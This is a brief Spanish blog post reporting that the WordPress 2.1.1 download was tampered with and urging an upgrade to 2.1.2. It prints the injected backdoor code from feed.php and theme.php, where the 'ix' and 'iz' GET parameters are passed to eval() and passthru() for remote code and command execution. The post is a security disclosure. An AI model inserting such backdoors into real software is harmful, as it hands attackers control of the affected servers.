WordPress 2.1.1 Comprometido

Hace unos dias alguien ha entrado en la maquina de descargas de worpress y se han cambiado dos ficheros en wp-include en los cuales han metido codigo para ejecutar codigo por medio de parametro GET. Tal como dicen en la web de wordpress hay que actualizar inmeditamente a la version 2.1.2

El codigo injectado esta en estos dos ficheros:

  • wp-includes/feed.php

    84
    85
    86
    87
    
    function comment_text_phpfilter($filterdata) {
        eval($filterdata);
    }
        
    
    149
    150
    
    if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
        
    
  • wp-includes/theme.php

    408
    409
    410
    411
    
    function get_theme_mcommand($mcds) {
      passthru($mcds);
    }
        
    
    441
    442
    
    if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
        
    

PHP5 EAccelerator
BlackBerry 7130v vs HTC P4350
comments powered by Disqus